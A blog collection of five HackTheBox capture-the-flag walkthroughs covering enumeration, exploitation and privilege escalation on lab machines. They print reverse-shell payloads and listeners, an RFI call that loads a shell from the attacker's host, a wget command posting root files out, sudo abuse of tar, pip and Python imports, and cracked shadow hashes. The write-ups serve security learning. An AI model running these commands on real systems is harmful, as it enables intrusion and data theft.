HackTheBox – Tartarsauce Writeup

This box was really a fun one. because its a proper CTF box with lots of red hearings. so lets begin with nmap scan.

root@kali:~# nmap -sC -sV 10.10.10.88 -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 23:57 IST
Nmap scan report for 10.10.10.88
Host is up (0.24s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page

we have port 80 open which is a good option for starting enumeration. we find quite a lot of good info for enumeration . it was found after a painful amount of time enumerating monstra 3.0.4 service with default credentials , and then to find out it was a rabbit hole!

We move our enumeration onto the webservices sub site with gobuster.

go run main.go -u http://10.10.10.88/webservices -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20

we find an interesting finding :

wordpress hosted at : http://10.10.10.88/webservices/wp/

we quickly enumerate more on wordpress site using wpscan along with enumerate plugin option.

wpscan -u http://10.10.10.88/webservices/wp/ –enumerate p

from initial results , it was found not to be vulnerable to any LFI, RFI or remote shell. Another quick red hearing! , author has forged the version of the plugin “gwolle-gb – v2.3.10″ even though it is of lower version which is vulnerable to ,

https://www.exploit-db.com/exploits/38861/

to trick the wordpress scanner.

using this exploit, we create and host a php reverse shell from pentest monkey on our attacker box and use the RFI bug to execute this exploit like this:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.13:8000/prs

problem here is with the application not restricting inclusion of a remote script in this case, its our reverse shell from our attacker box.

anddd we have our netcat listener catch a shell :

root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.88] 38966
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
13:14:44 up 13:19, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off
$ whoami
www-data

 

but still we are not even a proper user on this box to read user flag.

we enumerate more , to find some unusual priv esc loophole :

www-data@TartarSauce:/home$ sudo -l

User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar

so we can run tar binary as onuma user. we can priv esc to onuma user using the tar command as follows :

sudo -u onuma tar cf /dev/null /tmp/exploit –checkpoint=1 –checkpoint-action=exec=/bin/bash

tar: /tmp/exploit: Cannot stat: No such file or directory
onuma@TartarSauce:/tmp$

anddd we are onuma user. quickly grab the flag and buckle up. because real fun starts now!

we run our basic enumeration on the box. for possible priv esc vectors.

we find a systemd timer thats interesting :

[-] Systemd timers:
NEXT LEFT LAST PASSED UNIT ACTIVATES

Thu 2018-09-13 02:27:36 EDT 3min 14s left Thu 2018-09-13 02:22:36 EDT 1min 45s ago backuperer.timer backuperer.service

we have a custom systemd service file named backuper.service which runs for every 5 mins.

from the content of the service file it is found out it further invokes a binary named “backuperer

onuma@TartarSauce:~$ cat /lib/systemd/system/backuperer.service

[Unit]
Description=Backuperer

[Service]
ExecStart=/usr/sbin/backuperer

running the binary, which in turn points to /var/backups where backups are created.

we find few interesting files under this,

-rw-r–r– 1 onuma onuma 11511663 Sep 13 02:42 onuma-www-dev.bak
-rw-r–r– 1 root root 15693 Mar 9 2018 onuma_backup_error.txt
-rw-r–r– 1 root root 219 Sep 13 02:42 onuma_backup_test.txt

we can understand that this backuperer binary is backing up website every five minutes. and after a quick check with onuma_backup_error.txt,

we find out that it prints out a difference of the file if the integrity check fails(we will come back to this soon).  example difference is shown below.

Integrity Check Error in backup last ran : Fri Mar 9 13:12:49 EST 2018
————————————————————————
/var/tmp/.ad6461410d5752be98ad3f884a48cd3f95f930a0
Only in /var/www/html/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha: ȜӎŗgͷͼȜ_5h377

lets get the binary to our attacker box for further analysis . we use netcat for file transfer from remote system as follows.

on attacker box :   nc -nlvp 1234 > backuper

on victim box :    nc -w 3 -nv 10.10.14.5 1234 < /usr/sbin/backuperer
Connection to 10.10.14.5 1234 port [tcp/*] succeeded!

running strings command on the binary reveals the source code of the binary , which is a plain bash file.

root@kali:~# strings backuper
#!/bin/bash
#————————————————————————————-
# backuperer ver 1.0.2 – by
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#————————————————————————————-
# Set Vars Here
basedir=/var/www/html #not writable
bkpdir=/var/backups #not writable
tmpdir=/var/tmp # this is writable and interesting
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d’ ‘ -f1)
check=$tmpdir/check

/* snipped */

# Backup onuma website dev files.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
/usr/bin/diff -r $basedir $check$basedir

#/usr/bin/diff -r /var/www/html /var/tmp/check/var/www/html
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
# Report errors so the dev can investigate the issue.
/usr/bin/printf $”$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n” >> $errormsg
integrity_chk >> $errormsg
exit 2
/* snipped */

 

highlighted part is of our  interest, as the binary takes the backup of the web directory and stores it in  a temp directory and goes to sleep for 30 seconds. after 30 seconds , it calls for integrity_check function which checks for the difference in any of the files content between current web directory and the temporary backed up directory. if difference is found it prints the difference in the content to error file which was previously shown.

We can use this to steal content of privileged files owned by root as diff command follows symbolic link, we get content of files such as shadow file and what not! but we will steal root flag since its the file of our interest.

so lets begin! we have to remember if we fail to change content of the file in 30 seconds when the binary is called , we have to wait another 5 mins to re execute our strategy.

first, create a  test file as www-user and write junk values or random values into it,

touch /var/www/html/test.txt

echo “abc” > test.txt

Next,  once backup starts , we have 30 seconds to remove the old file and add new one with symbolic link to /root/root.txt

so in 30 seconds window,

ln -s  /root/root.txt   /var/www/html/test.txt

now if we go back to the /var/backups and view the onuma_backup_error.txt file! we can see our root flag !

cat /var/backups/onuma_backup_error.txt 

————————————————————————
Integrity Check Error in backup last ran : Thu Sep 13 08:43:32 EDT 2018
————————————————————————
/var/tmp/.1fb6cf3c3d4b97fb3bf095b660d6da6d2ee309f1
diff -r /var/www/html/test.txt /var/tmp/check/var/www/html/test.txt
1c1
< <contents of root flag>> #THIS IS ROOT FLAG 😀

> abc

we got the root flag Woot Woot 🙂 hope you enjoyed this walkthrough . stay tuned for the next write up .   shubha dina! 🙂

HackTheBox – Sunday Writeup

Hi All, Today we are going to solve  ‘Sunday’ machine from hackthebox. This was one of the easiest boxes on HTB. Lets begin with nmap scan.

nmap -p- 10.10.10.76

<<snipped>>

PORT                   STATE         SERVICE
79/tcp                 open             finger

22022                 open              SSH

<<snipped>>

This was the most frustrating part, as the services on this box were unstable and unresponsive.

so, we can use finger  service to enumerate users on the box.

we can use a custom wordlist and finally make use of this enum script by pentest monkey :

http://pentestmonkey.net/tools/user-enumeration/finger-user-enum

we find that a user named sunny exists on the remote machine. through the list.

root@kali:~# finger sunny@10.10.10.76
Login Name   TTY     Idle         When                        Where
sunny sunny    pts/3            <Apr 24 01:51>     10.10.14.7

we also found out that after few brute attempts, we can use sunny user to login with password sunday. Lets use this to SSH in to the victim box.

root@kali:~# ssh sunny@10.10.10.76 -p 22022

password : sunday

Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ ls
Desktop Documents Downloads local.cshrc local.login local.profile Public

 

we are in! but after quick enumeration it was found out we cannot read “user.txt” as its owned by another user named sammy.

sunny@sunday:/export/home/sammy/Desktop$ cat user.txt
cat: user.txt: Permission denied

after looking around, we find an interesting backup file in the backup folder .

sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls
agent22.backup shadow.backup

its backup of shadow file! lets copy it back to our attacker box along with /etc/passwd file and crack it using john.

sunny@sunday:/backup$ cat shadow.backup
<<snipped>>

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

<<snipped>>

on our attacker box , first lets convert it to a format so john can crack it.

root@kali#unshadow passwd shadow > pass.db

root@kali# john pass.db –wordlist=/root/Downloads/rockyou.txt

root@kali# john –show pass.db
sammy: cooldude! :101:10:sammy:/export/home/sammy:/bin/bash
sunny: sunday :65535:1:sunny:/export/home/sunny:/bin/bash

2 password hashes cracked, 0 left

cool! now we know password for sammy user as cooldude!

Lets SSH in using the creds and quickly grab the user.txt flag.

root@kali:~# ssh sammy@10.10.10.76 -p 22022
Password: cooldude!

sammy@sunday:~/Desktop$ cat user.txt

Now lets move on to privilege escalation to root user.

by enumerating the box, we found out sammy can run few commands as root. he can run wget  as root  . This is another classic priv esc technique in which we can read files owned by root.

sammy@sunday:~/Desktop$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget

wget has –post-file option which can be used to post file contents to a remote server

For this , we will read root flag using this vector.

lets setup a netcat listener on our attacker box :

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 …

and on victim box,

sudo wget –post-file=/root/root.txt 10.10.14.13:8000

we should be able to receive the content of root flag by now on our netcat listener .

root@kali:~/Desktop/hackthebox/sunday# nc -lvp 8000
listening on [any] 8000 …
10.10.10.76: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.76] 42964
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.14.13:8000
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

<<contents of root flag>>

I also tried replacing the /etc/passwd file with our added user on to the victim server using another wget priv esc vector. for some reason it failed.

nevertheless, we grabbed the  root flag 🙂 stay tuned for next writeup!

 

 

 

HackTheBox – Canape Fastrun WriteUp

Hi All, today we are going to solve canape machine from hackthebox..this walkthrough would be a fast run! as i am still in hangover of clearing OSCP ( :D) and a bit busy this weekend..so i shall skip few commands and give you brief explanation how i solved this box.

 

So Lets start with nmap scan : nmap 10.10.10.70

PORT STATE SERVICE
80/tcp open http

we see only one port open…after a bit of enumeration from dirbusting the directories and other stuff, we find two interesting things :

  1. git repository is exposed : http://10.10.10.70/.git/
  2. we see a submit quotes page which lets us to submit quotes.

and a comment in the source code of page. which specifies another interesting page : http://10.10.10.70/check

from the git repository we download all the files recursively and clone it to a local repo.

 

root@kali:~/git# ls
__init__.py static templates

 

we find few interesting things in the python code.

first one being the poor input sanitization of “character” field . and the character and submitted quote is written directly to a file as the md5 of both.

as this line : p_id = md5(char + quote).hexdigest()

<<snipped>>

WHITELIST = [
“homer”,
“marge”,
“bart”,
“lisa”,
“maggie”,
“moe”,
“carl”,
“krusty”
]

if request.method == “POST”:
try:
char = request.form[“character”]
quote = request.form[“quote”]
if not char or not quote:
error = True
elif not any(c.lower() in char.lower() for c in WHITELIST):
error = True
else:
# TODO – Pickle into dictionary instead, `check` is ready
p_id = md5(char + quote).hexdigest()
outfile = open(“/tmp/” + p_id + “.p”, “wb”)
outfile.write(char + quote)
outfile.close()
success = True
except Exception as ex:
error = True

return render_template(“submit.html”, error=error, success=success)

 

<<snipped>>

and the next one being, in the check page code , we can see it is using pickle to deserialize the stored object from the file…From a recent vuln it was found that the way pickle handles data leads to RCE.

More on this vulnerability explained :

https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html

so our strategy is to create a payload inside character field and exploit the vuln by calling the check with our malicious md5 hashed file .(too lazy to share exploit 😀 write it yourself , this is fast run!  i shall share the git link :P)

character = reverse shell payload + “Homer”

once request is posted for quotes, we access the check page with our already known calculated md5 hash id named file. I used a python reverse shell payload from pentest monkey.

 

python -c “import os; import pty; import socket; lhost = ‘10.10.14.14’; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(‘HISTFILE’, ‘/dev/null’); pty.spawn(‘/bin/bash’); s.close();”

this is then used as shown in exploit , a class object under reduce function ,converted into pickle format using cpickle.dumps ( will find it in script) and post the request to quotes.

Then we post request to check with MD5 hashed filename.

We get a quick reverse shell ! 😀

root@kali:~# nc -nlvp 443
listening on [any] 443 …
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.70] 58594
www-data@canape:/$

but we are still , a low priv www user who does not have access to the actual user flag .

so lets enum more :

from /etc/passwd :

we find a valid user :

homer:x:1000:1000:homer,,,:/home/homer:/bin/bash

now enumerating more we find that it is running couch db for its backend database . and also few interesting things from the /var/www folder.

we can confirm couch db is running :

www-data@canape:/var/www/git$ curl -s http://localhost:5984
curl -s http://localhost:5984
{“couchdb”:”Welcome”,”version”:”2.0.0″,”vendor”:{“name”:”The Apache Software Foundation”}}

this version is found to be vulnerable to admin user priv escalation .

https://www.exploit-db.com/exploits/44498/

now we can exploit it like this :

www-data@canape:/var/www/git$ python 44498.py localhost -p 5984 -u menoe -P menoe
<t$ python 44498.py localhost -p 5984 -u menoe -P menoe
[+] User to create: menoe
[+] Password: menoe
[+] Attacking host localhost on port 5984
[+] User menoe with password menoe successfully created.

Now lets use the user to fetch juicy database details..(* after a long lookup at couch db docs ! *) .after few mins of enumeration , it was found that password was stored in following view :

www-data@canape:/var/www/git$ curl -s http://menoe:menoe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
<noe@localhost:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
{“_id”:”739c5ebdf3f7a001bebb8fc4380019e4″,”_rev”:”2-81cf17b971d9229c54be92eeee723296″,”item”:”ssh”,”password”:”0B4jyA0xtytZi7esBNGp“,”user”:””}

www-data@canape:/var/www/git$ su homer
Password: 0B4jyA0xtytZi7esBNGp

homer@canape:/var/www/git$ whoami
homer

and now ! we can grab the user.txt flag! Now lets move onto privilege escalation .

now, from quick enumeration , we find that homer can execute few commands as root :

homer@canape:/var/www/git$ sudo -l

User homer may run the following commands on canape:
(root) /usr/bin/pip install *

A classic priv esc scenario ! wild card entry for pip install! lets create a temporary folder and add setup.py inside it .with priv esc  🙂 here we have created a folder called privesc, inside it we have added a setup.py file which contains following code to steal root flag.(we can replace any priv code to execute)

homer@canape:/tmp/privesc$ cat setup.py

import os
os.system(“cat /root/root.txt > /tmp/root.txt”)
os.system(“chmod 777 /tmp/root.txt”)

 

we can leverage pip -e option to install from a local built package. finally run this command to get root flag!

homer@canape:/tmp/privesc$ sudo /usr/bin/pip install -e /tmp/privesc/

command exits with no files/directories error, but our code should have been run already!lets verify :

homer@canape:/tmp$ ls -l /tmp/root.txt
rwxrwxrwx 1 root root 33 Sep 15 10:53 /tmp/root.txt

thats awesome! now lets quickly get our root flag 😀

homer@canape:/tmp$ cat /tmp/root.txt
<<root flag contents >>

 

thats all for this fast run! thank you. stay tuned for next writeup . have a nice day!

HackTheBox – Poison Writeup

Posion machine on hackthebox retired Today  anddd  I will explain, how I solved Poison box on HacktheBox. This box was one of the earlier machines attempted ..and its fairly easier one to crack.

Lets begin our enumeration  with Nmap scan.

nmap -sC -sV 10.10.10.84 -T4

Nmap scan report for 10.10.10.84
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

From Nmap scan, we have two ports (22 and 80) open. its feasible to start our enumeration with the web server port.

On navigating to http://10.10.10.84,

we find an interesting portal which displays,

Temporary website to test local .php scripts.

Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

 

so lets navigate to listfiles.php as it seems interesting.

http://10.10.10.84/listfiles.php

we are greeted with the following content :

Array( [0] => . [1] => .. [2] => browse.php [3] => index.php [4] => info.php [5] => ini.php [6] => listfiles.php [7] => phpinfo.php [8] => pwdbackup.txt)

again, pwdbackup.txt looks interesting. Lets navigate to it:

http://10.10.10.84/listfiles.php

displays :

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

As we see, encoding appears to be base64 . so after decoding the coded text 13 times.

final decoded value : Charix!2#4%6&8(0

so it appears to be credentials of some sort.  and also username appears to be charix.

Lets use these credentials to connect through SSH .

ssh charix@10.10.10.84

charix@Poison:~ % whoami
charix

Andd we are in!

grab the user flag and lets continue our enumeration!

charix@Poison:~ % ls
secret.zip user.txt

we find an interesting file named secret.zip which is password protected. for some reason i was unable to unzip it on remote machine . so i copied the file to local using netcat :

on our local  machine : nc -nlvp 1234

on victim machine : nc -w 3 -nv attacker_ip 1234 < secret.zip

unzip the file with command using the same password which was used for SSH  : unzip secret.zip

and we get a file named secret as the content of the zip file . Also, we find that there is a vnc server running as root on victim machine.

charix@Poison:~ % ps -aux | grep root

<<snipped>>

root 529 0.0 0.7 23620 7148 v0- I Mon05 0:00.14 Xvnc :1 -deskto
root 540 0.0 0.3 67220 3288 v0- I Mon05 0:00.04 xterm -geometry

<<snipped>>

charix@Poison:~ %netstat -a

<<snipped>>

tcp4 0 0 localhost.5801 *.* LISTEN
tcp4 0 0 localhost.5901 *.* LISTEN

<<snipped>>

as it cannot be accessible from outside , we have to use local port forwarding to connect to it.

lets create a ssh tunnel to local port forward the vnc port.

on one of our terminal,

ssh -L 2345:localhost:5901 charix@10.10.10.84

once connected minimize the terminal to leave the session open.

interpretation of this command is that,

we are instructing ssh to open and listen on port (2345) on our local machine , whichever request hits port 2345 on our machine will be forwarded to server machine(i.e poison machine) on port 5901 through SSH tunnel.

here, localhost should not be confused to our local machine, it implies localhost on server machine(i.e poison machine).

now on a new terminal, lets connect to the vncserver with the extracted secret file as password:

vncviewer 127.0.0.1::2345 -passwd secret

we get the VNC session of root user! grab the root.txt flag anndd keep pawning!

stay tuned for more write ups. Have a wonderful day ahead! 🙂

 

 

HackTheBox – Stratosphere Writeup

Hi All, Stratopshere machine  retired today on hackthebox Andddddddd YES! I will explain how I solved Stratosphere box on Hackthebox  . This was  a medium difficulty level box and one of the interesting box that has a nice privilege escalation technique.

check out hackthebox for upskilling your pentest game : https://www.hackthebox.eu/

lets begin with basic nmap scan.

 

root@kali:~# nmap -sC -sV 10.10.10.64 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-31 21:57 IST
Nmap scan report for 10.10.10.64
Host is up (0.19s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (EdDSA)
80/tcp open http

from nmap scan , we have three ports open , out of which, port 80 and 22 is notable. It is feasible to start our enumeration from the web  port 80 .

From the dirbuster bruteforce , we find out that there is hidden site hosted at http://10.10.10.64/Monitoring/

After a quick enumeration it is found out that , site is built using struts , and also vulnerable to Apache Struts CVE-2017-5638.

POC can be found here :  https://github.com/mazen160/struts-pwn

we can get the code execution by executing the POC file as follows.

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘cat /etc/passwd’

<<snipped>>

richard:x:1000:1000:Richard F Smith,,,:/home/richard:/bin/bash

<<snipped>>

from /etc/passwd file, we get the user named ‘richard‘ active on the machine

similarly it is found that it is running mysql with credentials ‘admin’/’admin’ from a file named db_connect . but since mysql is not exposed to the public, we have to rely on our previously found RCE to execute sql commands. this can be done as follows :

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “show tables;”‘

from dumping tables , we find a table named ‘accounts‘ .

further dumping data from accounts table reveals certain credentials ,

python struts-pwn.py -u http://10.10.10.64/Monitoring/example/Welcome.action -c ‘mysql -u admin -padmin users -e “select * from accounts;”‘

fullName                       password                                                             username
Richard F. Smith   9tc*rhKuG5TyXvUJOrE^5CK7k     richard

These credentials can be used to connect through SSH on port 22. this gives us the user flag.

richard@stratosphere:~$ ls
Desktop             hashlib.py        __pycache__ test.py          user.txt

 

by quick enumeration , it is found out richard can execute few commands as root:

richard@stratosphere:~$ sudo -l
Matching Defaults entries for richard on stratosphere:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User richard may run the following commands on stratosphere:
(ALL) NOPASSWD: /usr/bin/python* /home/richard/test.py

and also , quick analysis of source code from test.py reveals, it is using hashlib library.

#!/usr/bin/python3
import hashlib

<<snipped>>

we can use a classic python priv esc library hijacking technique , where we can exploit how python looks for the imported libraries .

Since we have write permission to the working directory of the privileged python file. we can create a file named ‘hashlib.py’ with our custom code..  this makes python parser to look at our created file instead of the actual library file intended.

create a file named ‘hashlib.py’ in the same directory where ‘test.py’ is present with following content to display contents of  root.txt file and spawn a root shell.(more on this priv esc technique: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/)

import os
import pty
os.system(‘cat /root/root.txt’)
pty.spawn(“/bin/sh”)

now lets execute the following command to gain ROOT!

richard@stratosphere:~$ sudo /usr/bin/python3 /home/richard/test.py

#

Thank you. stay tuned for the next write up!